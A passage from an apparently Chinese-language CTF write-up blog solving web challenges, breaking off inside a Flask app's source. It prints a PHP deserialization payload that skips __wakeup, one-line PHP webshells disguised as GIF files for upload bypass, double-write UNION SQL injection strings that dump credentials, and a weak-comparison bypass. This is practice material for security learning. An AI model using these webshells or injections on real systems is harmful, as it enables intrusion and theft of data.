<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#构造</span></span><br><span class="line">?select=O:<span class="number">4</span>:<span class="string">&quot;Name&quot;</span>:<span class="number">2</span>:&#123;s:<span class="number">14</span>:<span class="string">&quot;%00Name%00username&quot;</span>;s:<span class="number">5</span>:<span class="string">&quot;admin&quot;</span>;s:<span class="number">14</span>:<span class="string">&quot;%00Name%00password&quot;</span>;i:<span class="number">100</span>;&#125;</span><br></pre></td></tr></table></figure>

<p>另外，为了防止我们在传入 select 之后，在 index.php 文件中对其进行反序列化时调用 <code>__wakeup()</code>，我们需要利用一个特性，即 <code>在反序列化字符串时，属性个数的值大于实际属性个数时，会跳过 __wakeup()函数的执行</code> 。</p>
<p>因此最终的 payload 如下：改为大于2即可</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?select=O:<span class="number">4</span>:<span class="string">&quot;Name&quot;</span>:<span class="number">4</span>:&#123;s:<span class="number">14</span>:<span class="string">&quot;%00Name%00username&quot;</span>;s:<span class="number">5</span>:<span class="string">&quot;admin&quot;</span>;s:<span class="number">14</span>:<span class="string">&quot;%00Name%00password&quot;</span>;i:<span class="number">100</span>;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="5-1-总结：序列化"><a href="#5-1-总结：序列化" class="headerlink" title="5.1 总结：序列化"></a>5.1 总结：序列化</h2><ul>
<li><strong>Private 所声明的私有变量</strong> 只能在所声明的类中可见，在该类的子类以及该类的对象中均不可见。所以私有变量在序列化时，类名和字段名前面都会加上 <code>%00</code> ，即 ascii 为0的字符（不可见字符）；</li>
<li><strong>Protected 所声明受保护类型的变量</strong> 序列化时会有 <code>%00*%00</code> 字符；</li>
</ul>
<p><strong>测试一：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileHandler</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$op</span>=<span class="string">&#x27;2&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$filename</span>=<span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$content</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$flag</span> = <span class="keyword">new</span> FileHandler();</span><br><span class="line"><span class="variable">$flag_1</span> = (serialize(<span class="variable">$flag</span>));</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag_1</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#返回</span></span><br><span class="line">O:<span class="number">11</span>:<span class="string">&quot;FileHandler&quot;</span>:<span class="number">3</span>:&#123;s:<span class="number">2</span>:<span class="string">&quot;op&quot;</span>;s:<span class="number">1</span>:<span class="string">&quot;2&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;filename&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;flag.php&quot;</span>;s:<span class="number">7</span>:<span class="string">&quot;content&quot;</span>;N;&#125;</span><br></pre></td></tr></table></figure>

<p><strong>测试二：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileHandler</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$op</span>=<span class="string">&#x27;2&#x27;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$filename</span>=<span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$content</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$flag</span> = <span class="keyword">new</span> FileHandler();</span><br><span class="line"><span class="variable">$flag_1</span> = (serialize(<span class="variable">$flag</span>));</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag_1</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#返回</span></span><br><span class="line">O:<span class="number">11</span>:<span class="string">&quot;FileHandler&quot;</span>:<span class="number">3</span>:&#123;s:<span class="number">15</span>:<span class="string">&quot;FileHandlerop&quot;</span>;s:<span class="number">1</span>:<span class="string">&quot;2&quot;</span>;s:<span class="number">21</span>:<span class="string">&quot;FileHandlerfilename&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;flag.php&quot;</span>;s:<span class="number">20</span>:<span class="string">&quot;FileHandlercontent&quot;</span>;N;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#实际上是</span></span><br><span class="line">O:<span class="number">11</span>:<span class="string">&quot;FileHandler&quot;</span>:<span class="number">3</span>:&#123;s:<span class="number">15</span>:<span class="string">&quot;%00FileHandler%00op&quot;</span>;s:<span class="number">1</span>:<span class="string">&quot;2&quot;</span>;s:<span class="number">21</span>:<span class="string">&quot;%00FileHandler%00filename&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;flag.php&quot;</span>;s:<span class="number">20</span>:<span class="string">&quot;%00FileHandler%00content&quot;</span>;N;&#125;</span><br></pre></td></tr></table></figure>

<p><strong>测试三：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileHandler</span> </span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$op</span>=<span class="string">&#x27;2&#x27;</span>;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$filename</span>=<span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$content</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$flag</span> = <span class="keyword">new</span> FileHandler();</span><br><span class="line"><span class="variable">$flag_1</span> = (serialize(<span class="variable">$flag</span>));</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag_1</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#返回</span></span><br><span class="line">O:<span class="number">11</span>:<span class="string">&quot;FileHandler&quot;</span>:<span class="number">3</span>:&#123;s:<span class="number">5</span>:<span class="string">&quot;*op&quot;</span>;s:<span class="number">1</span>:<span class="string">&quot;2&quot;</span>;s:<span class="number">11</span>:<span class="string">&quot;*filename&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;flag.php&quot;</span>;s:<span class="number">10</span>:<span class="string">&quot;*content&quot;</span>;N;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#实际上是</span></span><br><span class="line">O:<span class="number">11</span>:<span class="string">&quot;FileHandler&quot;</span>:<span class="number">3</span>:&#123;s:<span class="number">5</span>:<span class="string">&quot;%00*%00op&quot;</span>;s:<span class="number">1</span>:<span class="string">&quot;2&quot;</span>;s:<span class="number">11</span>:<span class="string">&quot;%00*%00filename&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;flag.php&quot;</span>;s:<span class="number">10</span>:<span class="string">&quot;%00*%00content&quot;</span>;N;&#125;</span><br></pre></td></tr></table></figure>

<h1 id="六、-极客大挑战-2019-Upload1"><a href="#六、-极客大挑战-2019-Upload1" class="headerlink" title="六、[极客大挑战 2019]Upload1"></a>六、[极客大挑战 2019]Upload1</h1><p><strong>考点：文件上传，过 &lt;?</strong></p>
<p>直接 1.php 尝试</p>
<p><img src="https://i.loli.net/2021/05/29/VkjGzKiOPpb63yf.png" alt="image-20210529142454107"></p>
<p>紧接着常规操作，修改 <code>Content-Type</code> </p>
<p><img src="https://i.loli.net/2021/05/29/OQ3JWt8evF1UPsq.png" alt="image-20210529142419089"></p>
<p>尝试其它后缀类型，发现 <code>.php3  .php2  .php5 </code> 均不行，而 <code>.phtml</code>  可以</p>
<p><img src="https://i.loli.net/2021/05/29/Uds4RP3wqxg69fe.png" alt="image-20210529142749239"></p>
<p>不能含有 <code>&lt;?</code> ，那么就得使用其它形式</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># hack_GIF_ma.phtml</span></span><br><span class="line">GIF89a</span><br><span class="line">&lt;script language=<span class="string">&quot;php&quot;</span>&gt;@<span class="keyword">eval</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;111&#x27;</span>])&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/05/30/kYWlSRZABKNFQ4I.png" alt="image-20210529145853336"></p>
<p>接下来就是获取图片上传的路径</p>
<p><img src="https://i.loli.net/2021/05/29/A7mGDtwczYH9OBj.png" alt="image-20210529145131278"></p>
<p>最后蚁剑连接即可</p>
<p><img src="https://i.loli.net/2021/05/30/YCGBi7I5uktXHhW.png" alt="image-20210529150128041"></p>
<h2 id="6-1-PHP-一句话木马变形"><a href="#6-1-PHP-一句话木马变形" class="headerlink" title="6.1 PHP 一句话木马变形"></a>6.1 PHP 一句话木马变形</h2><p><strong>过 &lt;?：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//.gif</span></span><br><span class="line">GIF89a</span><br><span class="line">&lt;script language=<span class="string">&quot;php&quot;</span>&gt;@<span class="keyword">eval</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;cmd&#x27;</span>])&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><strong>常用：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//.gif</span></span><br><span class="line">GIF89a</span><br><span class="line"><span class="meta">&lt;?php</span> fputs(fopen(<span class="string">&#x27;shell.php&#x27;</span>,<span class="string">&#x27;w&#x27;</span>),<span class="string">&quot;&lt;?php @eval(<span class="subst">$_REQUEST</span>[&#x27;cmd&#x27;])?&gt;&quot;</span>); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h1 id="七、-ACTF2020-新生赛-Upload1"><a href="#七、-ACTF2020-新生赛-Upload1" class="headerlink" title="七、[ACTF2020 新生赛]Upload1"></a>七、[ACTF2020 新生赛]Upload1</h1><p><strong>考点：文件上传，前后端绕过</strong></p>
<p>直接 1.php 尝试</p>
<p><img src="https://i.loli.net/2021/05/29/7pOwsXyAPESITJv.png" alt="image-20210529150420684"></p>
<p>审查元素，前端存在过滤</p>
<p><img src="https://i.loli.net/2021/05/30/Mgrq4Sb5szHhpu9.png" alt="image-20210529151513235"></p>
<p>删除该代码，再次上传，虽然没有出现提示框，但仍旧没有成功上传</p>
<p>我们使用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># hack_GIF_ma.phtml</span></span><br><span class="line">GIF89a</span><br><span class="line">&lt;script language=<span class="string">&quot;php&quot;</span>&gt;@<span class="keyword">eval</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;111&#x27;</span>])&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>成功上传，然后蚁剑连接即可，该题也可上传 <code>.php2</code></p>
<h1 id="八、-极客大挑战2019-BabySQL1"><a href="#八、-极客大挑战2019-BabySQL1" class="headerlink" title="八、[极客大挑战2019]BabySQL1"></a>八、[极客大挑战2019]BabySQL1</h1><p><strong>考点：SQL注入之 or、and、from、select等的过滤</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">q<span class="string">&#x27;#					#单引号闭合</span></span><br></pre></td></tr></table></figure>

<p>经过测试，<code>or and union  select</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#联合查询 双写绕过  有回显</span></span><br><span class="line"><span class="comment">#过滤了 from where or select and</span></span><br><span class="line"></span><br><span class="line">q<span class="string">&#x27; UnUNIONIOn SeSelectLect 1,2,3#</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">#得到数据库 geek</span></span><br><span class="line"><span class="string">-q&#x27;</span> UnUNIONIOn SeSelectLect 1,database(),3<span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#得到表b4bsql,geekuser</span></span><br><span class="line">-q<span class="string">&#x27; UnUNIONIOn SeSelectLect 1,(selselectect group_concat(table_name) frfromom infoORrmation_schema.tables whwhereere table_schema=database()),3#	</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">#得到列id,username,password</span></span><br><span class="line"><span class="string">-q&#x27;</span> UnUNIONIOn SeSelectLect 1,(selselectect group_concat(column_name) frfromom infoORrmation_schema.columns whwhereere table_schema=database() aandnd table_name=0x62346273716c),3<span class="comment">#	</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#得到flag</span></span><br><span class="line">-q<span class="string">&#x27; UnUNIONIOn SeSelectLect 1,(selselectect group_concat(concat_ws(&#x27;</span>~<span class="string">&#x27;,username,passwOorRd)) frfromom geek.b4bsql),3#</span></span><br></pre></td></tr></table></figure>

<h1 id="九、-ACTF2020-新生赛-BackupFile1"><a href="#九、-ACTF2020-新生赛-BackupFile1" class="headerlink" title="九、[ACTF2020 新生赛]BackupFile1"></a>九、[ACTF2020 新生赛]BackupFile1</h1><p><strong>考点：备份文件泄露、PHP弱类型</strong></p>
<p>diesearch 扫</p>
<p>根据提示应该是.bak之类的</p>
<p><img src="https://i.loli.net/2021/05/30/rce32jAqIYXRzuE.png" alt="image-20210530150431783"></p>
<p>尝试之后，<code>/index.php.bak</code> 成功下载，查看其中内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include_once</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$key</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;key&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!is_numeric(<span class="variable">$key</span>)) &#123;</span><br><span class="line">        <span class="keyword">exit</span>(<span class="string">&quot;Just num!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$key</span> = intval(<span class="variable">$key</span>);</span><br><span class="line">    <span class="variable">$str</span> = <span class="string">&quot;123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$key</span> == <span class="variable">$str</span>) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;Try to find out source file!&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>简单的 php弱类型比较</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#构造</span></span><br><span class="line">?key=<span class="number">123</span></span><br></pre></td></tr></table></figure>

<p>获取到 flag</p>
<h2 id="9-1-总结"><a href="#9-1-总结" class="headerlink" title="9.1 总结"></a>9.1 总结</h2><p><strong>dirsearch 工具：</strong> <a target="_blank" rel="noopener" href="https://github.com/maurosoria/dirsearch">https://github.com/maurosoria/dirsearch</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># kali 下载</span></span><br><span class="line">git <span class="built_in">clone</span> https://github.com/maurosoria/dirsearch</span><br><span class="line"><span class="built_in">cd</span> dirsearch/</span><br><span class="line"><span class="comment">#使用</span></span><br><span class="line">./dirsearch.py -u 目标网址 -e *		<span class="comment"># *代表所有类型的脚本</span></span><br><span class="line">./dirsearch.py -u http://df0ee6df-14b2-4f2b-a5f3-2581279eee8d.node3.buuoj.cn/ -e *</span><br></pre></td></tr></table></figure>

<p><strong>常见的备份文件后缀：.git .svn .swp .~ .bak .bash_history.zip.tar.gz.rar.7z</strong></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/164086#h3-13">https://www.anquanke.com/post/id/164086#h3-13</a>)</p>
<h1 id="十、-HCTF-2018-admin1"><a href="#十、-HCTF-2018-admin1" class="headerlink" title="十、[HCTF 2018]admin1"></a>十、[HCTF 2018]admin1</h1><p><strong>考点：</strong></p>
<p>注册一个用户，查看各个页面的源码，发现</p>
<p><img src="https://i.loli.net/2021/06/03/hltLVI1OdZSrTui.png" alt="image-20210603105206841"></p>
<p><img src="https://i.loli.net/2021/06/03/Get7gWmync9S3ka.png" alt="image-20210603105127719"></p>
<p>下载 flask 模板源码</p>
<p>一一查看代码，找有用的信息</p>
<p><strong>index.html</strong></p>
<p><img src="https://i.loli.net/2021/06/03/N6b784u2PHA1hKw.png" alt="image-20210603110900853"></p>
<p>需要我们的 session 是 admin 的</p>
<p><strong>routes.py</strong>  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, render_template, url_for, flash, request, redirect, session, make_response</span><br><span class="line"><span class="keyword">from</span> flask_login <span class="keyword">import</span> logout_user, LoginManager, current_user, login_user</span><br><span class="line"><span class="keyword">from</span> app <span class="keyword">import</span> app, db</span><br><span class="line"><span class="keyword">from</span> config <span class="keyword">import</span> Config</span><br><span class="line"><span class="keyword">from</span> app.models <span class="keyword">import</span> User</span><br><span class="line"><span class="keyword">from</span> forms <span class="keyword">import</span> RegisterForm, LoginForm, NewpasswordForm</span><br><span class="line"><span class="keyword">from</span> twisted.words.protocols.jabber.xmpp_stringprep <span class="keyword">import</span> nodeprep</span><br><span class="line"><span class="keyword">from</span> io <span class="keyword">import</span> BytesIO</span><br><span class="line"><span class="keyword">from</span> code <span class="keyword">import</span> get_verify_code</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/code&#x27;</span></span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_code</span>():</span></span><br><span class="line">    image, code = get_verify_code()</span><br><span class="line">    <span class="comment"># 图片以二进制形式写入</span></span><br><span class="line">    buf = BytesIO()</span><br><span class="line">    image.save(buf, <span class="string">&#x27;jpeg&#x27;</span>)</span><br><span class="line">    buf_str = buf.getvalue()</span><br><span class="line">    <span class="comment"># 把buf_str作为response返回前端，并设置首部字段</span></span><br><span class="line">    response = make_response(buf_str)</span><br><span class="line">    response.headers[<span class="string">&#x27;Content-Type&#x27;</span>] = <span class="string">&#x27;image/gif&#x27;</span></span><br><span class="line">    <span class="comment"># 将验证码字符串储存在session中</span></span><br><span class="line">    session[<span class="string">&#x27;image&#x27;</span>] = code</span><br><span class="line">    <span class="keyword">return</span> response</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/index&#x27;</span></span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span>():</span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>, title = <span class="string">&#x27;hctf&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/register&#x27;</span>, methods = [<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">register</span>():</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> current_user.is_authenticated:</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;index&#x27;</span>))</span><br><span class="line"></span><br><span class="line">    form = RegisterForm()</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        name = strlower(form.username.data)</span><br><span class="line">        <span class="keyword">if</span> session.get(<span class="string">&#x27;image&#x27;</span>).lower() != form.verify_code.data.lower():</span><br><span class="line">            flash(<span class="string">&#x27;Wrong verify code.&#x27;</span>)</span><br><span class="line">            <span class="keyword">return</span> render_template(<span class="string">&#x27;register.html&#x27;</span>, title = <span class="string">&#x27;register&#x27;</span>, form=form)</span><br><span class="line">        <span class="keyword">if</span> User.query.filter_by(username = name).first():</span><br><span class="line">            flash(<span class="string">&#x27;The username has been registered&#x27;</span>)</span><br><span class="line">            <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;register&#x27;</span>))</span><br><span class="line">        user = User(username=name)</span><br><span class="line">        user.set_password(form.password.data)</span><br><span class="line">        db.session.add(user)</span><br><span class="line">        db.session.commit()</span><br><span class="line">        flash(<span class="string">&#x27;register successful&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;login&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;register.html&#x27;</span>, title = <span class="string">&#x27;register&#x27;</span>, form = form)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/login&#x27;</span>, methods = [<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span>():</span></span><br><span class="line">    <span class="keyword">if</span> current_user.is_authenticated:</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;index&#x27;</span>))</span><br><span class="line"></span><br><span class="line">    form = LoginForm()</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        name = strlower(form.username.data)</span><br><span class="line">        session[<span class="string">&#x27;name&#x27;</span>] = name</span><br><span class="line">        user = User.query.filter_by(username=name).first()</span><br><span class="line">        <span class="keyword">if</span> user <span class="keyword">is</span> <span class="literal">None</span> <span class="keyword">or</span> <span class="keyword">not</span> user.check_password(form.password.data):</span><br><span class="line">            flash(<span class="string">&#x27;Invalid username or password&#x27;</span>)</span><br><span class="line">            <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;login&#x27;</span>))</span><br><span class="line">        login_user(user, remember=form.remember_me.data)</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;index&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;login.html&#x27;</span>, title = <span class="string">&#x27;login&#x27;</span>, form = form)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/logout&#x27;</span></span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">logout</span>():</span></span><br><span class="line">    logout_user()</span><br><span class="line">    <span class="keyword">return</span> redirect(<span class="string">&#x27;/index&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/change&#x27;</span>, methods = [<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change</span>():</span></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> current_user.is_authenticated:</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;login&#x27;</span>))</span><br><span class="line">    form = NewpasswordForm()</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        name = strlower(session[<span class="string">&#x27;name&#x27;</span>])</span><br><span class="line">        user = User.query.filter_by(username=name).first()</span><br><span class="line">        user.set_password(form.newpassword.data)</span><br><span class="line">        db.session.commit()</span><br><span class="line">        flash(<span class="string">&#x27;change successful&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;index&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;change.html&#x27;</span>, title = <span class="string">&#x27;change&#x27;</span>, form = form)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/edit&#x27;</span>, methods = [<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>():</span></span><br><span class="line">    <span class="keyword">if</span> 